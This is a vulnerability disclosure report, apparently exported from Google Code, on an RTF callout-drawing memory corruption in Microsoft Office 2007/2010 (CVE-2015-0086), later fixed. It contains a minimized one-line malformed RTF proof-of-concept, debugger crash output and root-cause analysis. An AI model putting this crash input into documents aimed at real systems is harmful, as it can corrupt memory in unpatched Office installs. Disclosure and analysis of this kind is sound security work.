Microsoft Office 2007/2010 RTF callout drawing primitive memory corruption

[GoogleCodeExporter]

The following RTF file was found to crash Microsoft Office (2007 and 2010):

{\rtf1{\dpgroup\dpcallout\dppolyline\dppolyline\dppolycount2\dptxbx\dptxbx}}

Crash:

(91c.7d0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=118bb130 ebx=11122fec ecx=00000005 edx=00000000 esi=118bb11c edi=11123000
eip=7814537a esp=0011e10c ebp=0011e114 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
MSVCR80!memmove+0x5a:
7814537a f3a5            rep  movsd ds:118bb11c=00000000 es:11123000=????????
0:000> k
ChildEBP RetAddr
0011e114 3124734c MSVCR80!memmove+0x5a
WARNING: Stack unwind information not available. Following frames may be wrong.
0011e130 31809217 wwlib!FMain+0x2d9d
0011e1ac 31809083 wwlib!wdCommandDispatch+0x1494e4
001204e8 320b2d09 wwlib!wdCommandDispatch+0x149350
00120838 31ef4ea7 wwlib!DllGetClassObject+0xce460
00120a88 31c6c847 wwlib!DllCanUnloadNow+0x35c6de
00120ccc 31bbd3f0 wwlib!DllCanUnloadNow+0xd407e
00122398 31271cd4 wwlib!DllCanUnloadNow+0x24c27
00122a68 3129ef3b wwlib!FMain+0x2d725
00123b68 3129e372 wwlib!FMain+0x5a98c
00123bac 31491319 wwlib!FMain+0x59dc3
00126d28 3149103a wwlib!DllGetLCID+0x10773
0012b14c 31490ca7 wwlib!DllGetLCID+0x10494
0012b19c 31490b52 wwlib!DllGetLCID+0x10101
0012e2f8 314909d6 wwlib!DllGetLCID+0xffac
0012e31c 313165d8 wwlib!DllGetLCID+0xfe30
0012f580 313409cb wwlib!FMain+0xd2029
0012f630 31340893 wwlib!FMain+0xfc41c
0012f648 32812493 wwlib!FMain+0xfc2e4
0012f668 32812431 mso!Ordinal6541+0x327

Notes:

- The original sample crashed inconsistently (often upon application 
termination), so subsequent testing was performed with “application 
verifier” enabled. Reliable reproduction with the minimized sample is only 
possible with page heap enabled.

- The crash reproduces on Windows Server 2003 (Office 2007) and Windows 7 
(Office 2010). It does not appear to reproduce on Windows 8.1 (Office 2013).

- The crash occurs due to a memmove with an out-of-bounds destination buffer. 
It occurs on a second iteration of the function at 318090CA (wwlib.dll 
12.0.6713.5000) - the first call copies 50 bytes to a 50-byte buffer, and then 
the second call attempts to copy 40 bytes into space contiguous to this buffer.

- It appears to be memory corruption problem caused by a callout drawing 
primitives with multiple polylines followed by a count of drawing primitives 
greater than 1 and multiple text boxes.

- The function at 318090CA in wwlib.dll 12.0.6713.5000 (Office 2007) matches 
the function at 1089B15D in wwlib.dll 15.0.4675.1000 (Office 2013). Both 
functions appear to be structurally similar, indicating that this code path has 
not been rewritten between major releases. This may suggest that this issue has 
been discovered and resolved by Microsoft internally without backporting to 
previous security-supported releases, or that refactoring in another part of 
the code base has affected the ability to trigger this flaw.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by haw...@google.com on 10 Jan 2015 at 12:11

[GoogleCodeExporter]

This issue was resolved in MS15-022.

Original comment by haw...@google.com on 25 Mar 2015 at 12:47

• Changed state: Fixed
• Added labels: CVE-2015-0086
• Removed labels: Restrict-View-Commit

[GoogleCodeExporter]

Note that according to Microsoft this issue did affect Office 2010 and Office 
2013 - which makes sense given that we couldn't isolate any significant code 
changes between 2007 and 2013, despite not getting a reproducible crash.

Original comment by haw...@google.com on 25 Mar 2015 at 12:54

• Added labels: ****
• Removed labels: ****